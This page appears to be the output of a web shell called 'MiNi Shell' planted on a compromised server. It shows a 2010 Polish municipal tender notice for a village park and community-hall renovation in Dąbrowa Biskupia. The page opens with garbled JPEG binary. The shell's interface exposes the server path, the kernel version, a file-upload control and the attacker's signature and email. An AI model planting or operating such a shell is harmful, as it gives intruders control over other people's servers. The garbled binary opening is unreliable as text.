JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100512/120515-N-2010.html

<p class="kh_header"><b>Dąbrowa Biskupia: Urządzenie parku wiejskiego i remont świetlicy w Dąbrowie Biskupiej 
wraz z utwardzeniem przy niej placu jako miejsc spotkań i integracji społeczności</b><br>
<b>Numer ogłoszenia: 120515 - 2010; data zamieszczenia: 12.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Biskupia , Ul. Topolowa 2, 88-133 Dąbrowa Biskupia, woj. kujawsko-pomorskie, tel. (052) 351 21 70, faks (052) 351 21 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.dabrowabiskupia.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Urządzenie parku wiejskiego i remont świetlicy w Dąbrowie Biskupiej 
wraz z utwardzeniem przy niej placu jako miejsc spotkań i integracji społeczności.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE I  : Urządzenie parku wiejskiego w Dąbrowie Biskupiej polegające na  :
 - ułożeniu chodników z kostki betonowej wraz z obrzeżami, o pow. łącznej 478,24 m2 
 - wykonaniu drogi wraz z placem manewrowym z kostki betonowej  o pow. łącznej 404,50 m2, 
-  wykonaniu oświetlenia ciągów pieszych , 10 lamp z masztami, 
-  zagospodarowaniu zieleni poprzez wykarczowanie drzew i przygotowanie warstwy gleby a następnie sadzenie drzew i krzewów liściastych ( 93 szt.) i iglastych ( 60 szt.).
-  montażu elementów małej architektury
ZADANIE II :  Remont świetlicy w Dąbrowie Biskupiej wraz z utwardzeniem przy niej  placu
Na zadanie to składa się :
1)   utwardzenie placu przy świetlicy w Dąbrowie Biskupiej polegające na :
- rozebraniu istniejącej nawierzchni betonowej,
- wykonaniu robót ziemnych
- wykonaniu podbudowy, profilowaniu i zagęszczaniu podłoża
- wykonaniu nawierzchni z kostki brukowej betonowej o pow. 263,9 m2 
- wykonaniu obrzeży betonowych
- wykonanie zieleni drogowej;
2)  roboty remontowe w świetlicy w Dąbrowie Biskupiej polegające na :
- przygotowaniu ścian do malowania , 
- malowaniu ścian, podłóg i sufitów, krat, balustrad, rur, stolarki drzwiowej,
- wymianie 3 sztuk drzwi wraz z ościeżnicami,
- naprawie kraty zewnętrznej,
- demontażu i wykonaniu nowych balustrad na schodach i na balkonie,
- wykonaniu pochylni przy scenie i schodów na zaplecze,
- obłożeniu pochylni i schodów przy scenie oraz schodów zewnętrznych płytkami typu gress
- ociepleniu sceny styropianem i otynkowanie
- rozebraniu obudowy drewnianej ścian  
- uzupełnieniu listew na sufitach i ścianach drewnianych; 
3)przebudowa sceny i okotarowanie w świetlicy w Dąbrowie Biskupiej polegające na :
   -  dostawie oraz montażu elementów okotarowania oraz podłogi dla sceny, jak również zasłon na okna i drzwi dla sali głównej świetlicy w Dąbrowie Biskupiej.
   -  zaprojektowano dla sceny następujące elementy okotarowania: kurtyna główna, kulisy boczne - 6 szt, horyzont tylny, paludamenty - 3 szt. Tkaniną zaproponowaną do wykonania okotarowania sceny oraz zasłon na okna i drzwi w sali głównej świetlicy jest materiał typu plusz, posiadający aktualny certyfikat przeciwpożarowy.
   -  elementy okotarowania (kulisy, horyzont, paludamenty) zawieszone będą na stalowych uchwytach, rurach i linkach, a kurtyna będzie poruszała się po torowisku aluminiowym, w którym wózki jezdne poruszane będą przez silnik elektryczny sterowany ze sceny oraz stanowiska operatora na balkonie.
   -  dla podłogi sceny zaprojektowano  tzw. podłogę baletową.
Szczegółowy opis przedmiotu zamówienia określają SIWZ a w szczególności :
projekty budowlane,specyfikacje techniczne wykonania i odbioru robót, przedmiary robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.21.30-6, 45.21.21.40-9, 45.23.70.00-7, 45.23.32.00-1, 45.23.30.00-9, 45.11.10.00-8, 45.11.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 5000,00 PLN do terminuskładania ofert. Decyduje data wpływu środków na konto Zamawiającego. 
Z postępowania wyklucza się Wykonawców, którzy nie wnieśli wadium do upływu terminu składania ofert. 
W zależności od woli Wykonawcy wadium może być wnoszone w następujących formach:pieniądzu,poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,gwarancjach bankowych,gwarancjach ubezpieczeniowych,
poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z 9.11.2000 r. o utworzeniu PARP (Dz.U. z 2007r Nr 42 poz. 275 ze zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Nr 35 9551 0002 0200 0101 2010 0017 w Banku Spółdzielczym w Piotrkowie Kujawskim Oddział w Dąbrowie Biskupiej  do terminu składania ofert, z dopiskiem  :Wadium na przetarg.Potwierdzeniem tej formy wniesienia wadium będzie kopia przelewu załączona do oferty.Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone  do oferty oświadczenia  lub  dokumenty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać DLA ZADANIA I że: w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał co najmniej dwie roboty budowlane polegające  budowie nawierzchni z kostki betonowej o wartości co najmniej 50 000 zł każde i co najmniej dwie roboty polegające na urządzaniu terenów zielonych o zakresie zbliżonym do przedmiotu zamówienia  i wartości co najmniej 50 000 zł każde.
DLA ZADANIA II że: w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał co najmniej dwie roboty budowlane kubaturowe w zakresie remontu o wartości co najmniej 50 000 zł  każda i co najmniej dwie roboty budowlane polegające na budowie nawierzchni z kostki betonowej  o wartości co najmniej  50 000 zł każda</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje osobami, które posiadają uprawnienia do kierowania robotami budowlanymi we wszystkich branżach określonych w zakresie przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie     prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zestawienie rzeczowo - finansowe, dowód wniesienia wadium, pełnomocnictwo do reprezentacji w przypadku składania oferty przez pełnomocników ( jeśli  dotyczy)
pisemne zobowiązanie podmiotów oddających Wykonawcy niezbędne zasoby na okres  korzystania z nich przy wykonaniu zamówienia (jeżeli dotyczy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, jeżeli wystąpią następujące okoliczności:zmiana terminu wykonania przedmiotu zamówienia - Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy , w przypadku wystąpienia :zawieszenia robót przez Zamawiającego,wykopalisk uniemożliwiających wykonanie robót,szczególnie niesprzyjających warunków  atmosferycznych uniemożliwiających prowadzenie robót budowlanych,  przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów,
siły wyższej, klęski żywiołowej,jakiegokolwiek opóźnienia, utrudnienia lub przeszkód, za które wykonawca nie ponosi odpowiedzialności np. niewypałów i niewybuchów, wykopalisk archeologicznych,odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności  istnienie  podziemnych urządzeń, instalacji lub obiektów  infrastrukturalnych,jeżeli powstały konieczne zmiany  technologiczne, w szczególności :konieczności zrealizowania  projektu  przy  zastosowaniu innych  rozwiązań,  technicznych/technologicznych  niż wskazane w dokumentacji  projektowej w sytuacji, gdyby zastosowanie przewidzianych  rozwiązań  groziłoby niewykonaniem  lub wadliwym  wykonaniem  projektu,odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych  urządzeń instalacji  lub  obiektów infrastrukturalnych, konieczności zrealizowania projektu przy  zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego  prawa.
pozostałe zmiany: jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po  stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę ,
rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługuje  wykonawcy  zostanie  pomniejszone, przy  czym  Zamawiający  zapłaci za  wszystkie  spełnione  świadczenia  oraz udokumentowane  koszty,  które  wykonawca  poniósł w związku z wynikającymi z umowy  planowaniami  świadczeniami,kolizja z planowanymi  lub równolegle prowadzonymi przez inne  podmioty inwestycjami - w takim  przypadku  zmiany  w umowie  zostaną ograniczone  do zmian  koniecznych powodujących  uniknięcie  kolizji, a  wynagrodzenie  zostanie  ustalone z zachowaniem  zasady opisanej w siwz i ofercie wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowabiskupia.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dąbrowa Biskupia, ul. Topolowa 2, 88-133 Dąbrowa Biskupia, pokój 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2010 godzina 10:00, miejsce: Urząd Gminy Dąbrowa Biskupia, ul. Topolowa 2, 88-133 Dąbrowa Biskupia, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt będzie współfinansowany w ramach działania 4.1/413 Wdrażanie lokalnych strategii rozwoju PROW 2007-2013 dla operacji które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Urządzenie parku wiejskiego w Dąbrowie Biskupiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - ułożeniu chodników z kostki betonowej wraz z obrzeżami, o pow. łącznej 478,24 m2 
 - wykonaniu drogi wraz z placem manewrowym z kostki betonowej  o pow. łącznej 404,50 m2, 
-  wykonaniu oświetlenia ciągów pieszych , 10 lamp z masztami, 
-  zagospodarowaniu zieleni poprzez wykarczowanie drzew i przygotowanie warstwy gleby a następnie sadzenie drzew i krzewów liściastych ( 93 szt.) i iglastych ( 60 szt.).
-  montażu elementów małej architektury.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.21.30-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont świetlicy w Dąbrowie Biskupiej wraz z utwardzeniem przy niej  placu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na zadanie to składa się :
1)   utwardzenie placu przy świetlicy w Dąbrowie Biskupiej polegające na :
- rozebraniu istniejącej nawierzchni betonowej,
- wykonaniu robót ziemnych
- wykonaniu podbudowy, profilowaniu i zagęszczaniu podłoża
- wykonaniu nawierzchni z kostki brukowej betonowej o pow. 263,9 m2 
- wykonaniu obrzeży betonowych
- wykonanie zieleni drogowej;
2)  roboty remontowe w świetlicy w Dąbrowie Biskupiej polegające na :
- przygotowaniu ścian do malowania , 
- malowaniu ścian, podłóg i sufitów, krat, balustrad, rur, stolarki drzwiowej,
- wymianie 3 sztuk drzwi wraz z ościeżnicami,
- naprawie kraty zewnętrznej,
- demontażu i wykonaniu nowych balustrad na schodach i na balkonie,
- wykonaniu pochylni przy scenie i schodów na zaplecze,
- obłożeniu pochylni i schodów przy scenie oraz schodów zewnętrznych płytkami typu gress
- ociepleniu sceny styropianem i otynkowanie
- rozebraniu obudowy drewnianej ścian  
- uzupełnieniu listew na sufitach i ścianach drewnianych; 
3)   przebudowa sceny i okotarowanie w świetlicy w Dąbrowie Biskupiej polegające na :
   -  dostawie oraz montażu elementów okotarowania oraz podłogi dla sceny, jak również zasłon na okna i drzwi dla sali głównej świetlicy w Dąbrowie Biskupiej.
   -  zaprojektowano dla sceny następujące elementy okotarowania: kurtyna główna, kulisy boczne - 6 szt, horyzont tylny, paludamenty - 3 szt. Tkaniną zaproponowaną do wykonania okotarowania sceny oraz zasłon na okna i drzwi w sali głównej świetlicy jest materiał typu plusz, posiadający aktualny certyfikat przeciwpożarowy.
   -  elementy okotarowania (kulisy, horyzont, paludamenty) zawieszone będą na stalowych uchwytach, rurach i linkach, a kurtyna będzie poruszała się po torowisku aluminiowym, w którym wózki jezdne poruszane będą przez silnik elektryczny sterowany ze sceny oraz stanowiska operatora na balkonie.
   -  dla podłogi sceny zaprojektowano  tzw. podłogę baletową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.21.40-9, 45.23.70.00-7, 45.23.32.00-1, 45.23.30.00-9, 45.11.10.00-8, 45.11.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com